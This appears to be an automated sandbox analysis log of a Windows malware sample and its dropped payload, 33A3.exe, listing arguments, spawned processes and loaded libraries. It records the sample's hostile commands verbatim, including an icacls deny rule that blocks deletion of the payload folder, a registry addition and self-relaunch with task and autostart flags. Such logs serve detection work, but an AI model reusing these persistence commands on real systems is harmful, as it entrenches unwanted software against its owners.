Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --Service	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: X1P	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --Admin	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: runas	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: x2Q	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: x*P	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: C:\Windows\	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: D:\Windows\	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: 7P	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: %username%	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: F:\	9_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --Admin	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: IsAutoStart	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: IsTask	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --ForNetRes	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: IsAutoStart	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: IsTask	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --Task	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --AutoStart	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --Service	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: X1P	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: --Admin	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: runas	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: x2Q	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: x*P	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: C:\Windows\	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: D:\Windows\	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: 7P	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: %username%	14_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Command line argument: F:\	14_2_00419F90

Source: XVM5nluelx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\user\Searches\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\XVM5nluelx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: XVM5nluelx.exe

ReversingLabs: Detection: 31%

Source: 33A3.exe	String found in binary or memory: set-addPolicy
Source: 33A3.exe	String found in binary or memory: id-cmc-addExtensions
Source: 33A3.exe	String found in binary or memory: set-addPolicy
Source: 33A3.exe	String found in binary or memory: id-cmc-addExtensions
Source: 33A3.exe	String found in binary or memory: set-addPolicy
Source: 33A3.exe	String found in binary or memory: id-cmc-addExtensions
Source: 33A3.exe	String found in binary or memory: set-addPolicy
Source: 33A3.exe	String found in binary or memory: id-cmc-addExtensions

Source: unknown	Process created: C:\Users\user\Desktop\XVM5nluelx.exe "C:\Users\user\Desktop\XVM5nluelx.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\dejcbcc C:\Users\user\AppData\Roaming\dejcbcc
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\B88.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\33A3.exe C:\Users\user\AppData\Local\Temp\33A3.exe
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process created: C:\Users\user\AppData\Local\Temp\33A3.exe C:\Users\user\AppData\Local\Temp\33A3.exe
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process created: C:\Users\user\AppData\Local\Temp\33A3.exe "C:\Users\user\AppData\Local\Temp\33A3.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process created: C:\Users\user\AppData\Local\Temp\33A3.exe "C:\Users\user\AppData\Local\Temp\33A3.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe --Task
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe --Task
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5C0B.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1028 -s 10828
Source: unknown	Process created: C:\Windows\explorer.exe explorer.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\dejcbcc C:\Users\user\AppData\Roaming\dejcbcc
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\B88.bat" "	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\33A3.exe C:\Users\user\AppData\Local\Temp\33A3.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5C0B.bat" "	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process created: C:\Users\user\AppData\Local\Temp\33A3.exe C:\Users\user\AppData\Local\Temp\33A3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d" /deny *S-1-1-0:(OI)(CI)(DE,DC)	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Process created: C:\Users\user\AppData\Local\Temp\33A3.exe "C:\Users\user\AppData\Local\Temp\33A3.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe --Task	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Process created: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe "C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe" --AutoStart

Source: C:\Users\user\Desktop\XVM5nluelx.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\XVM5nluelx.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dejcbcc	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\33A3.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: drprov.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ntlanman.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: davclnt.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: davhlpr.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: browcli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe	Section loaded: msasn1.dll
